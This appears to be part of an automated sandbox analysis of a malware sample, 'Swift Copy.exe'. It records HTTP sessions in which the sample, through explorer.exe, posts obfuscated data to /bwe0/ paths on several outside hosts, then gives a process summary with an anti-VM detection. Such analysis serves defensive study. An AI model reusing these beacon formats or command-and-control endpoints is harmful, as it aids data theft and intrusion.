                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.kinemartigues.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.kinemartigues.com/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
                                                Timestamp: Aug 11, 2022 06:29:53.659858942 CEST
                                                kBytes transferred: 11852
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:29:53 GMT
                                                Server: Apache
                                                Location: https://www.kinemartigues.com/bwe0/
                                                Content-Length: 243
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/">here</a>.</p></body></html>


                                                Session ID: 4
                                                Source IP: 192.168.2.3
                                                Source Port: 49821
                                                Destination IP: 51.159.175.169
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:29:55.693173885 CEST
                                                kBytes transferred: 11856
                                                Direction: OUT
                                                Data: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1
                                                Host: www.kinemartigues.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Aug 11, 2022 06:29:55.733656883 CEST
                                                kBytes transferred: 11857
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:29:55 GMT
                                                Server: Apache
                                                Location: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==
                                                Content-Length: 376
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 69 6e 65 6d 61 72 74 69 67 75 65 73 2e 63 6f 6d 2f 62 77 65 30 2f 3f 59 4e 39 3d 77 36 50 54 70 36 70 70 2d 5a 66 74 65 32 61 30 26 61 6d 70 3b 39 72 56 38 7a 6c 3d 4d 37 39 79 67 4f 4b 5a 42 2b 4c 72 6d 57 74 4a 42 51 71 4d 79 43 65 34 6f 31 49 39 59 6b 72 7a 6c 4e 6b 74 34 59 35 6c 51 53 56 72 74 73 48 6d 44 4e 34 72 44 71 4b 36 6a 64 62 49 71 66 49 6d 6c 46 30 35 79 6a 39 41 6e 43 54 6e 66 71 66 42 4a 2f 74 71 76 65 47 2f 72 59 41 37 6e 66 30 30 53 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA==">here</a>.</p></body></html>


                                                Session ID: 5
                                                Source IP: 192.168.2.3
                                                Source Port: 49822
                                                Destination IP: 103.67.235.120
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:30:01.027570009 CEST
                                                kBytes transferred: 11858
                                                Direction: OUT
                                                Data: POST /bwe0/ HTTP/1.1
                                                Host: www.epic45.co.uk
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.epic45.co.uk
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.epic45.co.uk/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
                                                Timestamp: Aug 11, 2022 06:30:01.248380899 CEST
                                                kBytes transferred: 11859
                                                Direction: IN
                                                Data: HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 04:30:01 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 393
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>


                                                Session ID: 6
                                                Source IP: 192.168.2.3
                                                Source Port: 49823
                                                Destination IP: 103.67.235.120
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:30:03.300090075 CEST
                                                kBytes transferred: 11859
                                                Direction: OUT
                                                Data: GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
                                                Host: www.epic45.co.uk
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Aug 11, 2022 06:30:03.520287991 CEST
                                                kBytes transferred: 11860
                                                Direction: IN
                                                Data: HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Thu, 11 Aug 2022 04:30:03 GMT
                                                Content-Type: text/html; charset=iso-8859-1
                                                Content-Length: 393
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>


                                                Session ID: 7
                                                Source IP: 192.168.2.3
                                                Source Port: 49825
                                                Destination IP: 103.92.235.55
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:30:09.121141911 CEST
                                                kBytes transferred: 11870
                                                Direction: OUT
                                                Data: POST /bwe0/ HTTP/1.1
                                                Host: www.mogdento.com
                                                Connection: close
                                                Content-Length: 412
                                                Cache-Control: no-cache
                                                Origin: http://www.mogdento.com
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Content-Type: application/x-www-form-urlencoded
                                                Accept: */*
                                                Referer: http://www.mogdento.com/bwe0/
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate
                                                Data Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00
                                                Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
                                                Timestamp: Aug 11, 2022 06:30:10.063811064 CEST
                                                kBytes transferred: 11876
                                                Direction: IN
                                                Data: HTTP/1.1 404 Not Found
                                                Date: Thu, 11 Aug 2022 04:30:09 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"
                                                Connection: close
                                                Transfer-Encoding: chunked
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 
70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 37 2f 63 72 6f 70 70 65 64 2d 57 68 61 74 73 41 70 70 2d 49 6d 61 67 65 2d 32 30 32 32 2d 30 37 2d 32 35 2d 61 74 2d 31 31 2e 30 30 2e 31 36 2d 41 4d 2e 6a 70 65 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d
                                                Data Ascii: 3e30<!DOCTYPE html><html lang="en-US" class="no-js no-svg"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - MOGDENTO</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - MOGDENTO" /><meta property="og:site_name" content="MOGDENTO" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://mogdento.com/#organization","name":"MOGDENTO","url":"https://mogdento.com/","sameAs":[],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://mogdento.com/#/schema/logo/image/","url":"https://mogdento.com/wp-content/uploads/2022/07/cropped-WhatsApp-Image-2022-07-25-at-11.00.16-AM.jpeg","contentUrl":"https://mogdento.com


                                                Session ID: 8
                                                Source IP: 192.168.2.3
                                                Source Port: 49828
                                                Destination IP: 103.92.235.55
                                                Destination Port: 80
                                                Process: C:\Windows\explorer.exe
                                                Timestamp: Aug 11, 2022 06:30:11.325797081 CEST
                                                kBytes transferred: 11911
                                                Direction: OUT
                                                Data: GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1
                                                Host: www.mogdento.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Timestamp: Aug 11, 2022 06:30:12.432917118 CEST
                                                kBytes transferred: 11911
                                                Direction: IN
                                                Data: HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 11 Aug 2022 04:30:11 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w==
                                                Content-Length: 0
                                                Connection: close
                                                Content-Type: text/html; charset=UTF-8



                                                Target ID:0
                                                Start time:06:28:04
                                                Start date:11/08/2022
                                                Path:C:\Users\user\Desktop\Swift Copy.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Swift Copy.exe"
                                                Imagebase:0x30000
                                                File size:951808 bytes
                                                MD5 hash:50D4FB3F5A33007C2F80E5BBAA5E0CCD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
